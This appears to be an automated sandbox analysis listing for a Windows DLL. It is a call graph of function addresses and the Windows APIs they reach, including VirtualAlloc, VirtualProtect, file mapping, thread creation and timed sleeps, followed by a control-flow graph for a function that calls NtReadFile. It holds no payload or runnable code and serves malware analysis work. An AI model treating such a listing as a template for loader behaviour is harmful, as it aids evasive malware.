CallUnexpected 36424->36468 36432 6c8fb951 36425->36432 36426 6c8fbd81 36467 6c8fbd9e LeaveCriticalSection CallUnexpected 36426->36467 36430 6c8fbd55 36430->36426 36466 6c8f8848 14 API calls __dosmaperr 36430->36466 36469 6c8fb417 36432->36469 36435 6c8fb984 36437 6c8fb99b 36435->36437 36438 6c8fb989 GetACP 36435->36438 36436 6c8fb972 GetOEMCP 36436->36437 36437->36392 36439 6c8f93ef 36437->36439 36438->36437 36440 6c8f942d 36439->36440 36441 6c8f93fd 36439->36441 36481 6c8f87d8 14 API calls __dosmaperr 36440->36481 36442 6c8f9418 HeapAlloc 36441->36442 36446 6c8f9401 __dosmaperr 36441->36446 36444 6c8f942b 36442->36444 36442->36446 36445 6c8f9432 36444->36445 36445->36387 36445->36388 36446->36440 36446->36442 36480 6c8fc504 EnterCriticalSection LeaveCriticalSection __dosmaperr 36446->36480 36449 6c8fb951 43 API calls 36448->36449 36450 6c8fbe3a 36449->36450 36451 6c8fbf3f 36450->36451 36453 6c8fbe77 IsValidCodePage 36450->36453 36458 6c8fbe92 CallUnexpected 36450->36458 36493 6c8f0c5b 36451->36493 36453->36451 36455 6c8fbe89 36453->36455 36454 6c8fbc61 36454->36393 36454->36399 36456 6c8fbeb2 GetCPInfo 36455->36456 36455->36458 36456->36451 36456->36458 36482 6c8fba25 36458->36482 36459->36392 36460->36395 36461->36392 36462->36396 36463->36397 36464->36392 36465->36430 36466->36426 36467->36424 36470 6c8fb435 36469->36470 36476 6c8fb42e 36469->36476 36470->36476 36477 6c8fa940 41 API calls 3 library calls 36470->36477 36472 6c8fb456 36478 6c8f970f 41 API calls _fread 36472->36478 36474 6c8fb46c 36479 6c8f976d 41 API calls _fread 36474->36479 36476->36435 36476->36436 36477->36472 36478->36474 36479->36476 36480->36446 36481->36445 36483 6c8fba4d GetCPInfo 36482->36483 36492 6c8fbb16 36482->36492 36488 6c8fba65 36483->36488 36483->36492 36484 6c8f0c5b CatchGuardHandler 5 API calls 36486 6c8fbbc8 36484->36486 36486->36451 36500 6c90089e 36488->36500 36491 6c901243 46 API calls 36491->36492 36492->36484 36494 6c8f0c64 IsProcessorFeaturePresent 36493->36494 36495 6c8f0c63 36493->36495 36497 6c8f1335 36494->36497 36495->36454 36571 6c8f12f8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36497->36571 36499 6c8f1418 36499->36454 36501 6c8fb417 41 API calls 36500->36501 36502 6c9008be 36501->36502 36520 6c8fc1bc 36502->36520 36504 6c9008eb 36505 6c900972 36504->36505 36507 6c8f93ef _fread 15 API calls 36504->36507 36510 6c90097a 36504->36510 36511 6c900910 CallUnexpected 36504->36511 36523 6c90099f 14 API calls __freea 36505->36523 36506 6c8f0c5b CatchGuardHandler 5 API calls 36508 6c8fbacd 36506->36508 36507->36511 36515 6c901243 36508->36515 36510->36506 36511->36505 36512 6c8fc1bc ___scrt_uninitialize_crt MultiByteToWideChar 36511->36512 36513 6c900959 36512->36513 36513->36505 36514 6c900960 GetStringTypeW 36513->36514 36514->36505 36516 6c8fb417 41 API calls 36515->36516 36517 6c901256 36516->36517 36526 6c901054 36517->36526 36524 6c8fc124 36520->36524 36523->36510 36525 6c8fc135 MultiByteToWideChar 36524->36525 36525->36504 36527 6c90106f 36526->36527 36528 6c8fc1bc ___scrt_uninitialize_crt MultiByteToWideChar 36527->36528 36531 6c9010b3 36528->36531 36529 6c90122e 36530 6c8f0c5b CatchGuardHandler 5 API calls 36529->36530 36532 6c8fbaee 36530->36532 36531->36529 36533 6c8f93ef _fread 15 API calls 36531->36533 36535 6c9010d9 36531->36535 36546 6c901181 36531->36546 36532->36491 36533->36535 36536 6c8fc1bc ___scrt_uninitialize_crt MultiByteToWideChar 36535->36536 36535->36546 36537 6c901122 36536->36537 36537->36546 36554 6c8f8bc9 36537->36554 36540 6c901190 36542 6c901219 36540->36542 36543 6c8f93ef _fread 15 API calls 36540->36543 36547 6c9011a2 36540->36547 36541 6c901158 36545 6c8f8bc9 7 API calls 36541->36545 36541->36546 36565 6c90099f 14 API calls __freea 36542->36565 36543->36547 36545->36546 36566 6c90099f 14 API calls __freea 36546->36566 36547->36542 36548 6c8f8bc9 7 API calls 36547->36548 36549 6c9011e5 36548->36549 36549->36542 36563 6c8fc276 WideCharToMultiByte _fread 36549->36563 36551 6c9011ff 36551->36542 36552 6c901208 36551->36552 36564 6c90099f 14 API calls __freea 36552->36564 36567 6c8f889c 36554->36567 36557 6c8f8bda LCMapStringEx 36562 6c8f8c21 36557->36562 36558 6c8f8c01 36570 6c8f8c26 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 36558->36570 36561 6c8f8c1a LCMapStringW 36561->36562 36562->36540 36562->36541 36562->36546 36563->36551 36564->36546 36565->36546 36566->36529 36568 6c8f899b __dosmaperr 5 API calls 36567->36568 36569 6c8f88b2 36568->36569 36569->36557 36569->36558 36570->36561 36571->36499 36572 6c8ab890 36575 6c8aa060 36572->36575 36578 6c8a5700 36575->36578 36581 6c8a58e0 36578->36581 36584 6c8a7ea0 36581->36584 36593 6c8a11b0 36584->36593 36590 6c8a7f17 36592 6c8a7f56 36590->36592 36608 6c9058e0 33 API calls __DllMainCRTStartup@12 36590->36608 36609 6c8a1000 36593->36609 36596 6c8d4280 36597 6c8d4296 36596->36597 36598 6c8d42a0 CreateWaitableTimerExW 36596->36598 36597->36598 36599 6c8d4341 36597->36599 36598->36599 36600 6c8d42b9 36598->36600 36601 6c8d4398 Sleep 36599->36601 36604 6c8d4335 36599->36604 36602 6c8d4337 CloseHandle 36600->36602 36605 6c8d42f5 SetWaitableTimer 36600->36605 36603 6c8a7efa 36601->36603 36602->36599 36607 6c8a1a70 57 API calls 36603->36607 36604->36599 36604->36601 36605->36602 36606 6c8d431b WaitForSingleObject CloseHandle 36605->36606 36606->36603 36606->36604 36607->36590 36610 6c8a1031 36609->36610 36611 6c8a1093 36609->36611 36610->36611 36613 6c9055d0 33 API calls __DllMainCRTStartup@12 36610->36613 36611->36596 36635 6c8ab8b0 36638 6c8aa070 36635->36638 36641 6c8a56e0 36638->36641 36644 6c8a58d0 36641->36644 36647 6c8a7f90 36644->36647 36664 6c8a9ed0 36647->36664 36650 6c8a802e __DllMainCRTStartup@12 36652 6c8a8081 VirtualAlloc 36650->36652 36653 6c8a80b4 __DllMainCRTStartup@12 36652->36653 36668 6c8abd40 33 API calls __DllMainCRTStartup@12 36653->36668 36655 6c8a8113 __InternalCxxFrameHandler 36669 6c8a2dd0 36655->36669 36659 6c8a815a 36663 6c8a81bd 36659->36663 36676 6c9058e0 33 API calls __DllMainCRTStartup@12 36659->36676 36661 6c8a11b0 33 API calls 36661->36663 36662 6c8d4280 6 API calls 36662->36663 36663->36661 36663->36662 36665 6c8a9f28 36664->36665 36677 6c8d4c10 36665->36677 36668->36655 36820 6c8a3040 36669->36820 36673 6c8a2e5a 36675 6c8a2d10 38 API calls 36673->36675 36674 6c9058e0 33 API calls __DllMainCRTStartup@12 36675->36659 36695 6c8dc180 36677->36695 36680 6c8a7fdf 36680->36650 36680->36674 36683 6c8d4d49 36686 6c8d4d20 36683->36686 36715 6c8d3b20 36683->36715 36684 6c8d4cd8 36684->36686 36689 6c8d4d10 36684->36689 36725 6c8ac770 HeapFree 36684->36725 36688 6c8d4d8d CloseHandle 36686->36688 36723 6c8d6010 36686->36723 36688->36680 36726 6c8ac770 HeapFree 36689->36726 36727 6c8de260 36695->36727 36699 6c8d4c96 36699->36680 36710 6c8dc3a0 GetFileInformationByHandle 36699->36710 36701 6c8dc2bd CreateFileW 36703 6c8dc2f3 36701->36703 36704 6c8dc352 GetLastError 36701->36704 36705 6c8dc304 GetLastError 36703->36705 36707 6c8dc220 36703->36707 36704->36699 36704->36707 36706 6c8dc315 SetFileInformationByHandle 36705->36706 36705->36707 36706->36707 36708 6c8dc380 GetLastError CloseHandle 36706->36708 36707->36699 36788 6c8ac770 HeapFree 36707->36788 36708->36707 36709 6c8dc397 36708->36709 36709->36699 36711 6c8dc46b GetLastError 36710->36711 36712 6c8dc3d5 36710->36712 36713 6c8d4cc2 36711->36713 36712->36713 36714 6c8dc3e2 GetFileInformationByHandleEx 36712->36714 36713->36683 36713->36684 36714->36711 36714->36713 36716 6c8d3b5a 36715->36716 36717 6c8d3b24 36715->36717 36716->36686 36718 6c8d3b4f 36717->36718 36719 6c8d3b69 36717->36719 36720 6c8d3b41 36717->36720 36718->36686 36719->36718 36721 6c8ac760 __DllMainCRTStartup@12 3 API calls 36719->36721 36818 6c8ac790 5 API calls __DllMainCRTStartup@12 36720->36818 36721->36718 36819 6c8d603b 38 API calls __DllMainCRTStartup@12 36723->36819 36725->36689 36726->36686 36728 6c8de29f 36727->36728 36729 6c8de2cb 36727->36729 36731 6c8de3cf 36728->36731 36732 6c8de2ae 36728->36732 36797 6c8d3ef0 33 API calls 36729->36797 36800 6c905450 33 API calls __DllMainCRTStartup@12 36731->36800 36789 6c8ac760 36732->36789 36735 6c8de2c0 36735->36729 36736 6c8de3d8 36735->36736 36801 6c905450 33 API calls __DllMainCRTStartup@12 36736->36801 36739 6c8de360 36740 6c8dc19a 36739->36740 36798 6c8ac770 HeapFree 36739->36798 36740->36699 36747 6c8de970 36740->36747 36741 6c8de38b 36741->36740 36799 6c8d3c40 35 API calls __DllMainCRTStartup@12 36741->36799 36746 6c8de2f8 36746->36739 36746->36741 36749 6c8de9ab 36747->36749 36748 6c8deadd SetLastError GetFullPathNameW 36748->36749 36750 6c8deaf6 GetLastError 36748->36750 36749->36748 36751 6c8deb16 GetLastError 36749->36751 36755 6c8deb42 36749->36755 36765 6c8dc1cc 36749->36765 36807 6c9048c0 33 API calls __DllMainCRTStartup@12 36749->36807 36750->36749 36753 6c8deb84 GetLastError 36750->36753 36751->36749 36754 6c8deeb1 36751->36754 36756 6c8deba0 36753->36756 36757 6c8deb93 36753->36757 36814 6c9056a0 33 API calls __DllMainCRTStartup@12 36754->36814 36758 6c8deb4d 36755->36758 36759 6c8deece 36755->36759 36756->36765 36809 6c8ac770 HeapFree 36756->36809 36808 6c8ac770 HeapFree 36757->36808 36771 6c8dec4b 36758->36771 36778 6c8deb60 36758->36778 36815 6c905970 33 API calls __DllMainCRTStartup@12 36759->36815 36765->36699 36765->36701 36765->36707 36767 6c8ded0e __DllMainCRTStartup@12 36779 6c8deda6 __DllMainCRTStartup@12 36767->36779 36811 6c9048c0 33 API calls __DllMainCRTStartup@12 36767->36811 36771->36767 36774 6c8d3b20 5 API calls 36771->36774 36772 6c8ded03 36772->36767 36810 6c9048c0 33 API calls __DllMainCRTStartup@12 36772->36810 36775 6c8dee82 36774->36775 36775->36767 36776 6c8deeff 36775->36776 36817 6c905450 33 API calls __DllMainCRTStartup@12 36776->36817 36778->36772 36780 6c8d3b20 5 API calls 36778->36780 36782 6c8deded 36779->36782 36812 6c8d3c40 35 API calls __DllMainCRTStartup@12 36779->36812 36783 6c8ded22 36780->36783 36782->36765 36813 6c8ac770 HeapFree 36782->36813 36783->36772 36786 6c8deee6 36783->36786 36816 6c905450 33 API calls __DllMainCRTStartup@12 36786->36816 36788->36699 36790 6c8da0b0 36789->36790 36791 6c8da0d9 36790->36791 36792 6c8da0c2 36790->36792 36793 6c8dc150 __DllMainCRTStartup@12 3 API calls 36791->36793 36802 6c8dc150 36792->36802 36796 6c8da0ec 36793->36796 36795 6c8da0d3 36795->36735 36796->36735 36797->36746 36798->36740 36799->36740 36803 6c8dc16d 36802->36803 36804 6c8dc162 RtlAllocateHeap 36802->36804 36805 6c904d50 __DllMainCRTStartup@12 GetProcessHeap HeapAlloc 36803->36805 36804->36795 36806 6c8dc172 36805->36806 36806->36795 36808->36756 36809->36765 36812->36782 36813->36765 36818->36718 36824 6c8a32d0 36820->36824 36823 6c8a2030 33 API calls __DllMainCRTStartup@12 36823->36673 36825 6c8a3393 36824->36825 36827 6c8a339f 36824->36827 36873 6c8a5dd0 40 API calls 36825->36873 36833 6c8a3405 36827->36833 36874 6c8ac000 35 API calls __DllMainCRTStartup@12 36827->36874 36830 6c8a3459 36875 6c8a2130 33 API calls __DllMainCRTStartup@12 36830->36875 36832 6c8a3473 36834 6c8ac330 __DllMainCRTStartup@12 33 API calls 36832->36834 36854 6c8d4490 36833->36854 36835 6c8a35cb 36834->36835 36836 6c8d5be0 33 API calls 36835->36836 36839 6c8a3680 36836->36839 36837 6c8d5be0 33 API calls 36838 6c8a36f9 36837->36838 36840 6c8a5e70 HeapFree 36838->36840 36839->36837 36841 6c8a372a 36840->36841 36842 6c8a380f 36841->36842 36876 6c8d4060 35 API calls __DllMainCRTStartup@12 36841->36876 36844 6c8ac330 __DllMainCRTStartup@12 33 API calls 36842->36844 36845 6c8a3856 36844->36845 36846 6c8a8630 __DllMainCRTStartup@12 33 API calls 36845->36846 36847 6c8a38bd 36846->36847 36858 6c8dd570 36847->36858 36851 6c8a3a2c 36878 6c8ca0f0 33 API calls __DllMainCRTStartup@12 36851->36878 36853 6c8a2e2e 36853->36823 36855 6c8d449d 36854->36855 36879 6c8d44d0 36855->36879 36859 6c8ac760 __DllMainCRTStartup@12 3 API calls 36858->36859 36860 6c8dd5b0 36859->36860 36861 6c8dd5bb CreateThread 36860->36861 36862 6c8dd652 36860->36862 36864 6c8a3934 36861->36864 36867 6c8dd5ed 36861->36867 36898 6c8dd6d0 SetThreadStackGuarantee 36861->36898 36897 6c905470 33 API calls __DllMainCRTStartup@12 36862->36897 36864->36853 36877 6c8a6a50 34 API calls 36864->36877 36869 6c8dd621 36867->36869 36895 6c8ac770 HeapFree 36867->36895 36896 6c8ac770 HeapFree 36869->36896 36872 6c8dd630 GetLastError 36872->36864 36873->36827 36874->36830 36875->36833 36876->36842 36877->36851 36878->36853 36892 6c8e8070 33 API calls 2 library calls 36879->36892 36881 6c8d4514 36882 6c8d4531 36881->36882 36885 6c8ac760 __DllMainCRTStartup@12 3 API calls 36881->36885 36883 6c8d453c 36882->36883 36884 6c8d45bf 36882->36884 36888 6c8d44be 36883->36888 36894 6c9049d0 33 API calls __DllMainCRTStartup@12 36883->36894 36893 6c905470 33 API calls __DllMainCRTStartup@12 36884->36893 36885->36882 36888->36832 36892->36881 36895->36869 36896->36872 36899 6c8dd727 36898->36899 36900 6c8dd740 36899->36900 36904 6c8ac770 HeapFree 36899->36904 36905 6c8ac770 HeapFree 36900->36905 36903 6c8dd74f 36904->36900 36905->36903 36906 6c8aa3b0 36909 6c8aa3c0 36906->36909 36918 6c8a2e70 36909->36918 36916 6c8a6980 35 API calls 36917 6c8aa3b9 36916->36917 36931 6c8a3190 36918->36931 36922 6c8a2ef1 36923 6c8a6980 36922->36923 36971 6c8a68b0 36923->36971 36926 6c8a2d40 36990 6c8a2f00 36926->36990 36930 6c8a2dc1 36930->36916 36935 6c8a3c40 36931->36935 36934 6c8a2030 33 API calls __DllMainCRTStartup@12 36934->36922 36936 6c8a3cfa 36935->36936 36938 6c8a3d06 36935->36938 36965 6c8a5dd0 40 API calls 36936->36965 36944 6c8a3d6c 36938->36944 36966 6c8ac000 35 API calls __DllMainCRTStartup@12 36938->36966 36940 6c8d4490 33 API calls 36942 6c8a3dda 36940->36942 36941 6c8a3dc0 36967 6c8a2130 33 API calls __DllMainCRTStartup@12 36941->36967 36945 6c8ac330 __DllMainCRTStartup@12 33 API calls 36942->36945 36944->36940 36946 6c8a3f32 36945->36946 36947 6c8d5be0 33 API calls 36946->36947 36950 6c8a3fe4 36947->36950 36948 6c8d5be0 33 API calls 36949 6c8a405d 36948->36949 36951 6c8a5e70 HeapFree 36949->36951 36950->36948 36952 6c8a408e 36951->36952 36953 6c8a4140 36952->36953 36968 6c8d4060 35 API calls __DllMainCRTStartup@12 36952->36968 36954 6c8ac330 __DllMainCRTStartup@12 33 API calls 36953->36954 36956 6c8a4183 36954->36956 36957 6c8a8630 __DllMainCRTStartup@12 33 API calls 36956->36957 36958 6c8a41e6 36957->36958 36959 6c8dd570 36 API calls 36958->36959 36960 6c8a425d 36959->36960 36964 6c8a2ec5 36960->36964 36969 6c8a6a50 34 API calls 36960->36969 36962 6c8a4355 36970 6c8ca0f0 33 API calls __DllMainCRTStartup@12 36962->36970 36964->36934 36965->36938 36966->36941 36967->36944 36968->36953 36969->36962 36970->36964 36978 6c8a68a0 36971->36978 36975 6c8a690d 36982 6c8a6a50 34 API calls 36975->36982 36977 6c8a6925 36977->36926 36983 6c8a6890 36978->36983 36981 6c8ca0f0 33 API calls __DllMainCRTStartup@12 36981->36975 36982->36977 36986 6c8a6990 36983->36986 36989 6c8a7530 CloseHandle 36986->36989 36988 6c8a689d 36988->36981 36989->36988 36994 6c8a4560 36990->36994 36993 6c8a2030 33 API calls __DllMainCRTStartup@12 36993->36930 36995 6c8a461a 36994->36995 36998 6c8a4626 36994->36998 37024 6c8a5dd0 40 API calls 36995->37024 36997 6c8a468c 37000 6c8d4490 33 API calls 36997->37000 36998->36997 37025 6c8ac000 35 API calls __DllMainCRTStartup@12 36998->37025 37003 6c8a46fa 37000->37003 37001 6c8a46e0 37026 6c8a2130 33 API calls __DllMainCRTStartup@12 37001->37026 37004 6c8ac330 __DllMainCRTStartup@12 33 API calls 37003->37004 37005 6c8a4852 37004->37005 37006 6c8d5be0 33 API calls 37005->37006 37009 6c8a4904 37006->37009 37007 6c8d5be0 33 API calls 37008 6c8a497d 37007->37008 37010 6c8a5e70 HeapFree 37008->37010 37009->37007 37011 6c8a49ae 37010->37011 37012 6c8a4a60 37011->37012 37027 6c8d4060 35 API calls __DllMainCRTStartup@12 37011->37027 37014 6c8ac330 __DllMainCRTStartup@12 33 API calls 37012->37014 37015 6c8a4aa3 37014->37015 37016 6c8a8630 __DllMainCRTStartup@12 33 API calls 37015->37016 37017 6c8a4b06 37016->37017 37018 6c8dd570 36 API calls 37017->37018 37019 6c8a4b7d 37018->37019 37023 6c8a2d95 37019->37023 37028 6c8a6a50 34 API calls 37019->37028 37021 6c8a4c75 37029 6c8ca0f0 33 API calls __DllMainCRTStartup@12 37021->37029 37023->36993 37024->36998 37025->37001 37026->36997 37027->37012 37028->37021 37029->37023 37030 6c8a5b50 37033 6c8a53e0 37030->37033 37035 6c8a5453 37033->37035 37034 6c8a54af 37037 6c8d5be0 33 API calls 37034->37037 37035->37034 37048 6c8dd7c0 36 API calls __DllMainCRTStartup@12 37035->37048 37038 6c8a54c7 37037->37038 37039 6c8a5e70 HeapFree 37038->37039 37040 6c8a54ec 37039->37040 37047 6c8d4110 33 API calls __DllMainCRTStartup@12 37040->37047 37042 6c8a5533 37049 6c8a6080 HeapFree 37042->37049 37044 6c8a55b7 37050 6c8a6a50 34 API calls 37044->37050 37046 6c8a55f1 37047->37042 37048->37034 37049->37044 37050->37046 37051 6c8bff90 37054 6c8bfff0 37051->37054 37055 6c8b8800 __DllMainCRTStartup@12 35 API calls 37054->37055 37056 6c8c0057 37055->37056 37057 6c8bb970 __DllMainCRTStartup@12 33 API calls 37056->37057 37058 6c8c0069 37057->37058 37060 6c8c00b5 __DllMainCRTStartup@12 37058->37060 37113 6c9058e0 33 API calls __DllMainCRTStartup@12 37058->37113 37067 6c8c0145 __DllMainCRTStartup@12 37060->37067 37072 6c8b0b40 37060->37072 37062 6c8bffb5 37064 6c8c0187 __DllMainCRTStartup@12 37065 6c8c01a3 37064->37065 37064->37067 37100 6c8c07d0 37065->37100 37115 6c8b72e0 34 API calls __DllMainCRTStartup@12 37067->37115 37068 6c8c01f4 __DllMainCRTStartup@12 37108 6c8b6990 37068->37108 37073 6c8b0bab __DllMainCRTStartup@12 37072->37073 37077 6c8b0bd4 __DllMainCRTStartup@12 37073->37077 37116 6c8bde10 37 API calls __DllMainCRTStartup@12 37073->37116 37075 6c8b0c10 __DllMainCRTStartup@12 37075->37077 37117 6c8bc120 36 API calls __DllMainCRTStartup@12 37075->37117 37077->37064 37078 6c8b0cd6 __DllMainCRTStartup@12 37078->37077 37118 6c8b1280 34 API calls __DllMainCRTStartup@12 37078->37118 37080 6c8b0db4 __DllMainCRTStartup@12 37081 6c8b0e2e 37080->37081 37083 6c8b0e2c __DllMainCRTStartup@12 37080->37083 37119 6c8c2af0 33 API calls __DllMainCRTStartup@12 37081->37119 37126 6c8b6bd0 HeapFree __DllMainCRTStartup@12 37083->37126 37085 6c8b0e3d __DllMainCRTStartup@12 37086 6c8b0f27 37085->37086 37087 6c8b0f68 37085->37087 37088 6c8b0f25 37085->37088 37120 6c8c2af0 33 API calls __DllMainCRTStartup@12 37086->37120 37121 6c905b20 33 API calls __DllMainCRTStartup@12 37087->37121 37088->37086 37122 6c905b20 33 API calls __DllMainCRTStartup@12 37088->37122 37091 6c8b0f36 __DllMainCRTStartup@12 37091->37077 37093 6c8b100b 37091->37093 37094 6c8b10be 37091->37094 37096 6c8b10bc 37093->37096 37097 6c8b10f4 37093->37097 37123 6c905ae0 33 API calls __DllMainCRTStartup@12 37094->37123 37096->37077 37125 6c905b20 33 API calls __DllMainCRTStartup@12 37096->37125 37124 6c905b20 33 API calls __DllMainCRTStartup@12 37097->37124 37101 6c8c07fc 37100->37101 37102 6c8c0812 37100->37102 37133 6c8c2900 33 API calls __DllMainCRTStartup@12 37101->37133 37134 6c8c2900 33 API calls __DllMainCRTStartup@12 37102->37134 37105 6c8c0808 37127 6c8af850 37105->37127 37107 6c8c0857 37107->37068 37149 6c8b13f0 37108->37149 37112 6c8b69ea 37114 6c8b72e0 34 API calls __DllMainCRTStartup@12 37112->37114 37114->37062 37115->37062 37116->37075 37117->37078 37118->37080 37119->37085 37120->37091 37126->37077 37128 6c8af8aa 37127->37128 37129 6c8af890 37127->37129 37142 6c905a30 33 API calls __DllMainCRTStartup@12 37128->37142 37135 6c8af460 37129->37135 37132 6c8af8f1 __DllMainCRTStartup@12 37132->37107 37133->37105 37134->37105 37136 6c8b0630 __DllMainCRTStartup@12 33 API calls 37135->37136 37140 6c8af4c0 37136->37140 37137 6c8b0630 __DllMainCRTStartup@12 33 API calls 37137->37140 37140->37137 37141 6c8af533 37140->37141 37143 6c8b0570 37140->37143 37147 6c9056f0 33 API calls __DllMainCRTStartup@12 37140->37147 37141->37132 37144 6c8b05bd 37143->37144 37145 6c8b05e7 37143->37145 37144->37140 37148 6c9056f0 33 API calls __DllMainCRTStartup@12 37145->37148 37165 6c8c2800 33 API calls __DllMainCRTStartup@12 37149->37165 37151 6c8b142b __DllMainCRTStartup@12 37166 6c8c31f0 37151->37166 37153 6c8b1454 __DllMainCRTStartup@12 37154 6c8b1473 37153->37154 37155 6c8b14c1 37153->37155 37169 6c8bbc70 33 API calls __DllMainCRTStartup@12 37154->37169 37170 6c8b7150 HeapFree __DllMainCRTStartup@12 37155->37170 37158 6c8b14d4 37164 6c8b6bd0 HeapFree __DllMainCRTStartup@12 37158->37164 37159 6c8b14bf 37171 6c9055d0 33 API calls __DllMainCRTStartup@12 37159->37171 37164->37112 37165->37151 37172 6c8c3320 37166->37172 37168 6c8c320d 37168->37153 37169->37159 37170->37158 37174 6c8c3362 __DllMainCRTStartup@12 37172->37174 37175 6c8c33bc __DllMainCRTStartup@12 37174->37175 37176 6c8bbff0 43 API calls __DllMainCRTStartup@12 37174->37176 37175->37168 37176->37174 37177 6c8bc150 37180 6c8b5c10 37177->37180 37183 6c8ba490 37180->37183 37182 6c8b5c50 37184 6c8ba4ce 37183->37184 37186 6c8ba4f5 __DllMainCRTStartup@12 37183->37186 37187 6c8ba570 37184->37187 37186->37182 37194 6c8c9580 37187->37194 37196 6c8c958d 37194->37196 37220 6c8c93b0 37196->37220 37198 6c8c962e 37224 6c8c9490 37198->37224 37200 6c8c963e __DllMainCRTStartup@12 37201 6c8c9754 37200->37201 37203 6c8c971a 37200->37203 37207 6c8c97bc 37200->37207 37202 6c8c9afd VirtualAlloc 37201->37202 37201->37203 37202->37203 37206 6c8c9b64 37202->37206 37204 6c8c9976 37236 6c8c92f0 HeapFree __DllMainCRTStartup@12 37204->37236 37205 6c8c9862 CreateFileMappingW 37210 6c8c9998 37205->37210 37211 6c8c995a 37205->37211 37239 6c8c92f0 HeapFree __DllMainCRTStartup@12 37206->37239 37207->37203 37207->37204 37207->37205 37237 6c8c92f0 HeapFree __DllMainCRTStartup@12 37210->37237 37211->37204 37214 6c8c998b 37216 6c8c9a1b 37214->37216 37217 6c8c99d4 MapViewOfFile 37214->37217 37215 6c8c999d 37215->37217 37238 6c8c92f0 HeapFree __DllMainCRTStartup@12 37216->37238 37217->37216 37218 6c8c9a19 37217->37218 37240 6c8c8bc0 37220->37240 37222 6c8c93fa CallUnexpected __DllMainCRTStartup@12 37223 6c8c9472 GetSystemInfo 37222->37223 37223->37198 37225 6c8c94ad 37224->37225 37226 6c8c94c0 37224->37226 37228 6c8c94ec 37225->37228 37229 6c8c9507 37225->37229 37230 6c8c94cd 37225->37230 37252 6c905c20 38 API calls 2 library calls 37226->37252 37232 6c8c9505 37228->37232 37233 6c8c9537 37228->37233 37253 6c905ae0 33 API calls __DllMainCRTStartup@12 37229->37253 37230->37200 37232->37230 37255 6c905b20 33 API calls __DllMainCRTStartup@12 37232->37255 37254 6c905c20 38 API calls 2 library calls 37233->37254 37236->37214 37237->37215 37238->37218 37239->37203 37245 6c8c8fa0 37240->37245 37242 6c8c8c2a 37242->37222 37246 6c8c8c08 37245->37246 37247 6c8c8fc3 37245->37247 37246->37242 37250 6c9056f0 33 API calls __DllMainCRTStartup@12 37246->37250 37247->37246 37251 6c9055d0 33 API calls __DllMainCRTStartup@12 37247->37251 37256 6c8c7730 37260 6c8c7990 37256->37260 37258 6c8c7758 VirtualProtect 37259 6c8c778b __DllMainCRTStartup@12 37258->37259 37262 6c8c7998 33 API calls __DllMainCRTStartup@12 37260->37262 37263 6c8c6970 37266 6c8c69d0 37263->37266 37269 6c8c6520 37266->37269 37270 6c8c656d 37269->37270 37271 6c8c6560 37269->37271 37275 6c8c7810 GetNativeSystemInfo 37270->37275 37276 6c905590 33 API calls __DllMainCRTStartup@12 37271->37276 37274 6c8c6572 37275->37274 37277 6c8d6250 37278 6c8d625a 37277->37278 37288 6c8d6298 37277->37288 37280 6c8d628c 37278->37280 37281 6c8d61f0 37278->37281 37295 6c8d610a 37278->37295 37302 6c8ac770 HeapFree 37280->37302 37301 6c8ac770 HeapFree 37281->37301 37284 6c8d63e3 37304 6c905990 33 API calls __DllMainCRTStartup@12 37284->37304 37286 6c8d63d7 37303 6c905970 33 API calls __DllMainCRTStartup@12 37286->37303 37295->37284 37295->37286 37295->37288 37296 6c8d3b20 5 API calls 37295->37296 37297 6c8d6440 37295->37297 37299 6c8dc630 37295->37299 37296->37295 37305 6c8d6467 37297->37305 37337 6c8dc652 37299->37337 37301->37295 37302->37288 37317 6c8dc490 37305->37317 37319 6c8dc4b8 37317->37319 37322 6c8dc7f0 37319->37322 37323 6c8dc819 NtReadFile 37322->37323 37325 6c8dc862 WaitForSingleObject 37323->37325 37326 6c8dc86f 37323->37326 37325->37326 37327 6c8dc4e3 37326->37327 37328 6c8dc8ab 37326->37328 37329 6c8dc886 37326->37329 37335 6c8d7160 HeapFree __DllMainCRTStartup@12 37328->37335 37329->37327 37330 6c8dc89c RtlNtStatusToDosError 37329->37330 37330->37327 37332 6c8dc8f4 37336 6c8d30e0 HeapFree __DllMainCRTStartup@12 37332->37336 37334 6c8dc904 37335->37332 37336->37334 37338 6c8dc679 37337->37338 37339 6c8dc785 37337->37339 37340 6c8dc7f0 4 API calls 37338->37340 37348 6c905950 33 API calls __DllMainCRTStartup@12 37339->37348 37344 6c8dc693 37340->37344 37349 6c8faa91 GetLastError 37350 6c8faaa7 37349->37350 37351 6c8faaad 37349->37351 37372 6c8f8afd 6 API calls __dosmaperr 37350->37372 37353 6c8f8b3c __dosmaperr 6 API calls 37351->37353 37370 6c8faab1 SetLastError 37351->37370 37354 6c8faac9 37353->37354 37356 6c8f87eb __dosmaperr 12 API calls 37354->37356 37354->37370 37357 6c8faade 37356->37357 37358 6c8faaf7 37357->37358 37359 6c8faae6 37357->37359 37361 6c8f8b3c __dosmaperr 6 API calls 37358->37361 37360 6c8f8b3c __dosmaperr 6 API calls 37359->37360 37362 6c8faaf4 37360->37362 37363 6c8fab03 37361->37363 37373 6c8f8848 14 API calls __dosmaperr 37362->37373 37364 6c8fab1e 37363->37364 37365 6c8fab07 37363->37365 37374 6c8fa742 14 API calls __dosmaperr 37364->37374 37367 6c8f8b3c __dosmaperr 6 API calls 37365->37367 37367->37362 37369 6c8fab29 37375 6c8f8848 14 API calls __dosmaperr 37369->37375 37372->37351 37373->37370 37374->37369 37375->37370

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 6C8DC7F0 Relevance: 4.6, APIs: 3, Instructions: 91filenativesynchronizationCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 374 6c8dc7f0-6c8dc817 375 6c8dc819-6c8dc832 374->375 376 6c8dc834-6c8dc838 374->376 377 6c8dc83a-6c8dc860 NtReadFile 375->377 376->377 378 6c8dc86f-6c8dc874 377->378 379 6c8dc862-6c8dc86b WaitForSingleObject 377->379 380 6c8dc87f-6c8dc884 378->380 381 6c8dc876-6c8dc87d 378->381 379->378 383 6c8dc8ab-6c8dc90f call 6c8d7160 call 6c8d30e0 380->383 384 6c8dc886-6c8dc888 380->384 382 6c8dc891 381->382 387 6c8dc894-6c8dc89b 382->387 385 6c8dc89c-6c8dc8a9 RtlNtStatusToDosError 384->385 386 6c8dc88a-6c8dc88e 384->386 385->387 386->382
                                                                                                                                                                APIs
                                                                                                                                                                • NtReadFile.NTDLL ref: 6C8DC855
